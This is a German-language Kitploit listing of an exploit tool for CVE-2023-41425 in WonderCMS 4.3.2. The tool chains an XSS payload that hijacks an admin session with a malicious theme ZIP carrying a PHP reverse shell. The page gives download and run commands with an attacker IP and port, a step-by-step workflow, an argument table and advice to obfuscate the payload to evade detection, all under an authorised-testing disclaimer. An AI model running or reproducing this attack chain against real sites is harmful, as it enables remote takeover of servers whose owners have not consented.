Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-41425-RCE-WonderCMS-4.3.2 — Automatisiert die Erstellung und das Hosting eines JavaScript XSS Payloads, um ein bösartiges Themenmodul zu installieren, das eine Reverse Shell über Remote Code Execution in WonderCMS auslöst. Dieses Tool verwendet PentestMonkeys PHP-Reverse-Shell-Skript als Payload. | Kitploit
Tools/GitHubGitHub/tea-on/cve-2023-41425-rce-wondercms-4.3.2
Phishing-ToolsPayload-GenerierungExploitationShellcodeWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed Teaming

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHub
tea-on/cve-2023-41425-rce-wondercms-4.3.2

CVE-2023-41425-RCE-WonderCMS-4.3.2

Automatisiert die Erstellung und das Hosting eines JavaScript XSS Payloads, um ein bösartiges Themenmodul zu installieren, das eine Reverse Shell über Remote Code Execution in WonderCMS auslöst. Dieses Tool verwendet PentestMonkeys PHP-Reverse-Shell-Skript als Payload.

Repository anzeigen
8vor 1 JahrNoch nicht geprüft

🚨 WonderCMS RCE Exploit Tool (CVE-2023-41425)

Dieses Python-basierte offensive Sicherheitstool automatisiert die Ausnutzung einer Remote Code Execution (RCE)-Sicherheitslücke in WonderCMS 4.3.2, speziell CVE-2023-41425. Es optimiert den Prozess der Erstellung eines schädlichen ZIP-Theme-Moduls und der Auslieferung eines JavaScript-basierten XSS-Payloads, um eine Admin-Sitzung zu kapern und eine PHP-Reverse-Shell zu installieren.

⚠️ Nur für Bildungs- und autorisierte Sicherheitstestzwecke.


📚 Inhaltsverzeichnis

  • ⚙️ Funktionen
  • 📥 Installation & Anforderungen
  • 🚀 Anwendungsbeispiele
  • 🧾 Argumentreferenz
  • 🧠 Detaillierter Arbeitsablauf
  • 🔐 Sicherheitshinweise
  • 📝 Lizenz & Quellenangabe

⚙️ Funktionen

  • Erzeugt ein bewaffnetes ZIP-Archiv mit eingebetteter PHP-Reverse-Shell
  • Erstellt einen JavaScript-basierten XSS-Payload, um Admin-Sitzungen zu kapern
  • Extrahiert CSRF-Tokens und automatisiert den Modulinstallationsprozess
  • Startet einen lokalen HTTP-Server, um Exploit-Dateien zu hosten
  • Kompatibel mit Kali Linux, ParrotOS und Python 3.6+

📥 Installation & Anforderungen

🔧 Anforderungen

  • Python 3.6+
  • Kompatibel mit Linux und macOS
  • Getestet auf Kali Linux

📦 Abhängigkeiten

Das Skript verwendet nur Pythons Standardbibliothek. Es sind keine externen Pakete erforderlich.

🛠 Installation

UNIX

root@kitploit:~
wget https://github.com/Tea-On/CVE-2023-41425-RCE-WonderCMS-4.3.2/archive/refs/heads/main.zip

unzip main.zip

cd CVE-2023-41425-RCE-WonderCMS-4.3.2-main

Windows

root@kitploit:~
git clone https://github.com/Tea-On/CVE-2023-41425-RCE-WonderCMS-4.3.2.git

cd ./CVE-2023-41425-RCE-WonderCMS-4.3.2

🚀 Anwendungsbeispiele

💻 Bash

root@kitploit:~
python3 exploit_CVE-2023-41425.py -u http://target/index.php?page=loginURL -H 192.168.0.100 -p 4444 -r reverseShell.php

🪟 PowerShell (WSL empfohlen)

root@kitploit:~
python3 exploit_CVE-2023-41425.py -u http://target/index.php?page=loginURL -H 192.168.0.100 -p 4444 -r ./reverseShell.php

🧾 Argumentreferenz


🧠 Detaillierter Arbeitsablauf

Hier ist eine Aufschlüsselung, was das Skript intern tut:

  1. Argument-Parsing:

    • Verwendet argparse, um erforderliche und optionale Eingaben vom Angreifer zu sammeln.
  2. Reverse-Shell-Vorbereitung:

    • Liest die bereitgestellte PHP-Reverse-Shell ein.
    • Ersetzt die Platzhalter $ip und $port durch die angegebenen Werte von -H und -p.
  3. Erstellung des schädlichen ZIP-Archivs:

    • Erstellt eine Verzeichnisstruktur wie: <dir_name>/<php_reverse_shell.php>.
    • Komprimiert es in <zip_name>.zip.
  4. XSS-Payload-Generierung (script.js):

    • Extrahiert das CSRF-Token von der Ziel-Anmeldeseite mittels DOM-Parsing.
    • Erstellt die Modulinstallations-URL mit dem gehosteten ZIP.
    • Installiert das schädliche Theme und löst die Reverse-Shell aus.
  5. Anleitung & Exploit-Hosting:

    • Gibt den nc-Listener-Befehl aus.
    • Zeigt die vollständige XSS-Zustellungs-URL an.
    • Startet einen einfachen HTTP-Server, um sowohl die ZIP- als auch die JS-Dateien zu hosten.

🔐 Sicherheitshinweise

  • 🧹 Bereinigung: Entfernen Sie nach der Nutzung immer erzeugte ZIPs, JS-Payloads und HTTP-Serverprotokolle.
  • 👀 Erkennung: Der Exploit kann von WonderCMS protokolliert oder von WAFs erkannt werden.
  • 🧪 Verantwortungsvoll testen: Greifen Sie nur Systeme an, für die Sie ausdrücklich autorisiert wurden.
  • 🔒 Reverse-Shells härten: Erwägen Sie eine Verschleierung oder Verschlüsselung des PHP-Payloads, um der Erkennung zu entgehen.

📝 Lizenz & Quellenangabe

Dieses Tool wird unter der MIT-Lizenz bereitgestellt.
Erstellt mit 🔥 von TeaOnHack🧋.

  • CVE-Referenz: CVE-2023-41425
  • WonderCMS: https://www.wondercms.com/

Dieses Projekt ist ausschließlich für Bildungszwecke und autorisierte Sicherheitsbewertungen gedacht. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.

Tool herunterladen
ArgumentErforderlichBeschreibungStandard
-u✅Ziel-WonderCMS-Anmelde-URL (z. B. http://target/index.php?...)—
-H, --host✅IP-Adresse des Angreifers (für Reverse Shell)—
-p✅Lauschport des Angreifers—
-r, --reverse-shell✅Pfad zum PHP-Reverse-Shell-Skript—
--dir-name❌Verzeichnis innerhalb des ZIP-Theme-ArchivsTeaOn
--http-port❌Port für lokalen HTTP-Server3000
--zip-name❌Name der erzeugten ZIP-Dateireverse-shell